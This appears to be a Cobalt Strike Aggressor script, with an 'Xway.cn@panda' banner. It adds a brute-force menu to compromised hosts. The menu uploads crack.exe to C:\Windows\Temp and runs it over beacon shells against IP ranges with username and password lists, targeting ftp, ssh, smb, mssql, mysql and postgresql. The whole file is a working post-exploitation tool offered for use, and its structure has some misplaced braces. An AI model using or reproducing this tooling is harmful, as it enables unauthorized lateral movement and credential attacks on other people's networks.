##############################
#                            #
#                            #
#                            #
#       Xway.cn@panda        #
#                            #
#                            #
#                            #
##############################
	    menu "暴力破解" {
			item "上传crack" {
				$bid = $1;
				$dialog = dialog("上传crack", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &crack);
				drow_text($dialog, "UploadPath",  "上传路径: "); 	
				dbutton_action($dialog, "上传");
				dialog_show($dialog);
        }
sub crack {

    bcd($bid, $3['UploadPath']);

        bupload($bid, script_resource("/script/crack.exe"));
    }
                item "运行crack"{
                    $bid = $1['@'];
                    $Dialog = dialog("运行crack",%(ip => "192.168.1.1/24，192.168.1-255，192.168.1.1", port => "3389", username => "filename list or username", password => "filename list or password", type => "ssh", thread => "默认线程100",bid => $bid),&crack_run);
                    dialog_description($Dialog, "支持爆破ftp，ssh，smb，mssql，mysql, postgresql,爆破完毕会在当前目录生成result.txt。");
                    drow_text($Dialog, "ip", "ip: ");
                    drow_text($Dialog, "port", "port: ");
					drow_text($Dialog, "username", "username: ");
					drow_text($Dialog, "password", "password: ");
					drow_text($Dialog, "type", "type: ");
					drow_text($Dialog, "thread", "thread: ");
                    dbutton_action($Dialog, "运行");
                    dialog_show($Dialog);
                }

sub crack_run{
    local('$Name $port $username $password $type $thread');
    $Name = $3['ip'];
    $port = replace($3['port'], "\"", "");
	$username = $3['username'];
	$password = $3['password'];
	$type = $3['type'];
	$thread = $3['thread'];
	bshell($bid, "crack.exe -i  $+ $Name -p  $+ $port -U  $+ $username -P  $+ $password -s  $+ $type -t  $+ $thread");
}  
	  
	  
	  }